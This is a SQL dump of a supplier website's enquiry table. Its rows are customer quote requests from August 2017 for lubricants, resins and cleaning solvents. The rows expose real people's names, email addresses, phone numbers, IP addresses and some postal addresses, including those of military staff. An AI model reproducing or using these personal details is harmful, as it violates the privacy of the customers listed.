INSERT INTO `wp_enquiry_detail_new` VALUES (1317, 'Shubham', 'szk381@psu.edi', 'Hi,\nWhat is the cost and shipping time for MS-111?', '2066931544', 'Purchasing MS-111', '104.39.234.213', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:30:"MS-111 | Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-01 16:19:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1318, 'Mike Fitzgerald', 'bfitzgerald@cerritos.edu', 'Hello \nI am Mike Fitzgerald from Cerritos College, teaching composites. I need a quote by the can / and the other ways you sell your product. (Case , box and now many cans in the box.) \nI would like to order this week,\nthanks for your help\nbest Regards\nMike Fitzgerald', '6268180325', 'Need quote for ms-242n', '198.188.96.4', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-01 21:44:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1319, 'SWASTIKA BITHI', 'swastika.bithi@ttu.edu', 'Hi \nwe need a price quote for Krytox 157-FSL 1 oz size', '8064701706', 'Purchase Krytox 157-FSL', '192.58.125.10', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-01 21:53:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1320, 'Chris Weishaar', 'chris.weishaar@navy.mil', 'I would like to request a quote for:\n(1) 240 AC Krytox Grease Tube (8oz.)\n\nIf you could make this to:\nNUWC Keyport\n610 Dowell Street\nKeyport, WA 98345\n\nWe would appreciate it.\n\nThank you very much.\n\nRespectfully,\nChris', '360-315-5826', 'Quote Request', '138.163.106.71', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-01 22:18:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1321, 'mark', 'mpatnode@ci.oceanside.ca.us', 'I need to get a price and availability on (8) 14oz tubes of this grease Please', '7604355840', 'Krytox GPL-217', '209.242.149.227', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"824";s:5:"title";s:7:"GPL 217";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_149749874.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-01 22:59:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1322, 'Vincent Krell', 'vince.krell@oln-afmc.af.mil', 'Need to purchase 12 cans of MS-555. Please include any shipping cost to 89031. \n\n\nVince Krell\nDept of the Air Force\nWhse 6\n2915 Losee Rd, Suite 104\nN. Las Vegas, NV 89030\n', '', 'RFQ - 12 cans MS-555', '132.3.61.80', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-02 10:58:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1323, 'JOSE CARLOS CORNELLO', 'jc.cornello@aegeurope.net', 'KRYTOX 250AD GREASE 4 OR 8 OZ - 1qty', '34954115061', 'QUOTE', '195.235.54.185', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"648";s:5:"title";s:5:"250AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_321602429.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-02 11:39:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1324, 'Jamie Thorpe ', 'jthorpe@synovos.com', 'Please send Quote for a case of \nMS-122AD', '540-854-2538', 'RFQ', '192.146.217.55', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-02 13:01:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1325, 'DOUG ', 'DOUG@INDUSTRIALMOTORSERVICE.COM', 'Hello,\nI need price and availability on MS-122AD, have been reading about it online and would like to sample a can if you sell 1 piece orders, before I place a larger order.', '864-314-1062', 'RFQ', '66.64.169.62', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-02 15:50:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1326, 'Carol Caudill', 'carol.caudill@ge.com', 'RFQ for 1 pint EPON Resin 828', '7605305364', 'RFQ EPON 828', '165.156.39.54', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-02 15:56:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1327, 'Rob Taylor', 'robert.taylor@external.fcagroup.com', 'Quote for 0.8KG cartridge. Canadian distributor for credit card purchase.', '519-561-9295', 'KRYTOX GPL 215', '129.9.75.194', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"822";s:5:"title";s:7:"GPL 215";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_60848668.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-02 17:33:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1328, 'MANUEL MUNOZ', 'MMUNOZ@SILVERWINGSAEROSPACE.COM', 'PLEASE QUOTE PRICE AND LEAD TIME', '3052585950', 'PLEASE QUOTE', '50.207.54.98', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:37:"MS-460H | Silicone Conformal Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-02 18:35:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1329, 'strousec', 'strousec@battelle.org', 'I would like to order your EPON 815C - please send me a quote and also please let me know how long it would take to get it.  Thank you so much!', '6144247542', 'Order/Quote', '131.167.254.131', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-02 19:41:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1330, 'Jennifer Brown', 'jennifer.brown@xyleminc.com', 'Hi,\nI need a quote for 500-1000 of Dupont GPL205. \nThank you.', '858-546-8327', 'RFQ for Dupont GPL205', '199.253.110.1', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 00:36:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1331, 'talkwithteresa', 'talkwithteresa@yahoo.com', 'Price quote', '', '', '166.181.83.207', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2800";s:5:"title";s:23:"MS-730L Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_486488371.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 08:01:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1332, 'talkwithteresa', 'talkwithteresa@yahoo.com', 'Price quote', '', '', '166.181.83.207', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:23:"MS-530N Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 08:03:52', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1333, 'talkwithteresa', 'talkwithteresa@yahoo.com', 'Price quote', '', '', '166.181.83.207', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:23:"MS-530N Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 08:04:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1334, 'Scooter Vogel', 'svogel@namedinc.com', 'I\\\'m looking for the price on the 2 oz tube. ', '8593226256', '2 oz price', '70.62.23.154', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"784";s:5:"title";s:7:"GPL 203";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_295431182.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 12:34:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1335, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'adasd', '', 'asdas', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 12:39:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1336, 'Jerry Trachsler', 'jerryt@cbdinc.net', 'Please quote 1qt and 1 gal of MS-462H\n\nThanks,\nJerry', '847-741-2233', 'RFQ', '73.73.17.144', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"732";s:5:"title";s:7:"MS-462H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-462H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 12:51:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1337, 'Alejandro Gonzalez', 'agonzalez@pco2.com', '2 oz. syringe', '2814211321', 'quote', '50.254.111.145', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"580";s:5:"title";s:5:"143AY";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_376558549.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 14:25:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1338, 'Steve Kennedy', 'steve@thekennedyco.com', 'Please provide a quote for Krytox GPL-225 in .8k cartridges.  Please include any price breaks for bulk or case orders. \nShipping: 23323  ', '7574698002', 'Krytox GPL-225', '70.169.9.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"848";s:5:"title";s:7:"GPL 225";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_159894728.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 14:40:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1339, 'Tom Mauriello', 'thomas.mauriello@navy.mil', 'Good afternoon,\n\nI would like to request a quote for a 1 gallon quantity of EPON Resin 828.\n\nThanks,\nTom Mauriello\n\nMechanical Engineer\nNSWC Indian Head EOD Tech Div\n301-744-6557', '301-744-6557', 'RFQ EPON Resin 828', '138.162.0.43', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 15:58:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1340, 'KILLIAN', 'KSTEINBUGL@LEEIND.COM', 'Can you provide price and delivery on Qty (7) 2oz. syringes of the KRYTOX GPL 206', '', 'QUOTE', '50.78.92.105', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 19:17:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1341, 'James Coble', 'Jcoble@parker.com', 'Need Price and delivery for 10 - 15 gallons of Vertrel SFR', '256-213-4095', 'Vertrel SFR', '108.171.131.170', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1276";s:5:"title";s:11:"Vertrel SFR";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-sfr.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 20:29:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1342, 'Midwest Camera Repair', 'repairs@midwestcamera.com', 'Do you have small sample can of this product we can purchase for testing?', '7342852220', 'Teflon Multi-use', '99.18.22.48', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1801";s:5:"title";s:16:"Teflon Multi-Use";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/teflon-multi-use-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 21:49:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1343, 'Midwest Camera Repair', 'repairs@midwestcamera.com', 'Do you have small sample cans of this product for testing? ', '', 'Vydax NRT 960', '99.18.22.48', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1683";s:5:"title";s:16:"Vydax™ NRT 960";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-vydax-dryfilm-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 21:54:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1344, 'Katherine Harriger', 'katherine.harriger@navy.mil', 'Hello, \n\nWould you provide me with a quote for MS-122ADL? Thank you.', '(760)9397367', 'MS-122ADL Quote', '138.163.106.71', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2763";s:5:"title";s:9:"MS-122ADL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_318864752.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-03 22:44:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1345, 'Roy Pettis', 'roy.pettis@dynetics.com', 'Need pricing today for 4 qt kits .\n\nthank you,', '256-713-5753', 'Hot quote for MS-383H', '204.154.192.252', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3606";s:5:"title";s:7:"MS-383H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_142198558.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-04 13:11:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1346, 'Justin Stailey', 'justin.stailey@navy.mil', 'I work for the DOD, DON and I would like a formal quote for 6 tubes of Krytox 240AC. In the quote if you could include the shipping to 1400 Farragut Ave. Bremerton, WA 98314 I would appreciate it. Three stipulations are the purchase will be made with a GOV CC, the card cannot be charged until the order ships, and no tax will be included. Thank you!', '360-627-6805', 'Quote', '138.163.106.71', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-04 15:00:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1347, 'Dan Dillulio', 'ddillulio@mschem.com', 'test', '', 'test', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"474";s:5:"title";s:44:"FluoroExtreme™ Dental Handpiece Lubricants";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/DENTAL.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-04 18:40:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1348, 'Linda Wunder', 'LINDA.WUNDER@TELEDYNE.COM', 'May I please get LT and pricing for the smallest bottle of MS-472C I can get please?', '6307543374', 'MS-472C', '192.88.94.1', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"736";s:5:"title";s:7:"MS-472C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-472C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-04 18:57:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1349, 'Jeff Kim', 'jkim@aaaairsupport.com', 'Hello\n\nLooking for price and delivery for a 1 oz needle nose bottle of VPF 1514 and a 1 oz tube of GPL 204\n\nThanks for taking a look, have a great rest of your day.', '949-275-1582', 'RFQ for VPF 1514 and GPL 204', '64.183.121.14', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"788";s:5:"title";s:7:"GPL 204";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_399075487.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-04 19:01:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1350, 'David Fanning', 'dfanning@tritex.com', 'TRI-TEX R&amp;D polymerization division requesting sample for lab trials .\nR&amp;D Manager &amp; Chemist John Cutt .\nRegards ', '450-974-1001', 'VAZO 64   azobisisobutyronitrile', '208.85.115.7', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"427";s:5:"title";s:32:"VAZO 64 | Azobisisobutyronitrile";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VAZO-64-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-04 21:15:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1351, 'Brooke McMahon', 'bmcmahon@apialliance.com', 'We have a customer that requires their boards to show no flux residue. ', '2606372739', 'no clean flux remover/cleaner', '68.50.174.187', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1695";s:5:"title";s:33:"MS-560 &#038; MS-562 Flux Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/miller-stephenson-flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-06 18:51:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1352, 'harry adcock', 'harry.adcock@airgas.com', 'HI IM WITH AIRGAS/ AIRLIQUIDE IN GEISMAR LA. WE NEED TO ORDER A CASE OF VERTREL CLEANING AGENT. PLEASE SEND ME A QUOTE SO I CAN GET A PO NUMBER. \nTHANK YOU HARRY ADCOCK', '2254062568', 'vertrel mca cleaning agent MS-750', '204.62.206.252', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:14:"Vertrel™ MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-07 15:36:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1353, 'Peter Engels', 'engelspw@gmail.com', 'Hi,\nCan you please let us know where we can purchase a Miller Stephenson Cobra Duster MS 228 (for the MS-222N aero-duster)? We have not been able to find a vendor anywhere.\nThanks!', '', 'Cobra Duster', '134.121.46.25', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1851";s:5:"title";s:14:"Cobra® Duster";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/COBRA-BRUSH.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-07 22:33:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1354, 'Tony Chen', 'tony.chen@amadamiyachi.com', 'I like to order 12 Cans of MS-555.\nPlease provide Pricing and Delivery.', '626-930-8547', 'Ordering 12 Cans of MS-555', '216.165.240.125', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-07 22:43:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1355, 'Brandon Carter', 'brandon.carter@olympus-osta.com', 'I would like to request a price quote on company letterhead for 6, 1- Aerosol cans of MS-580N.\n\nThank you.', '901-387-3942', 'Price Quote Request', '209.155.32.154', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-08 13:48:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1356, 'Pumidech Puthongkham', 'pp6wr@virginia.edu', 'I would like to get a quote for EPON Resin 828, all size of them.', '4342490759', 'Inquiry for a quote for EPON Resin 828', '199.111.225.229', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-08 15:15:52', '', NULL, '', '', '', NULL, '', ''); 
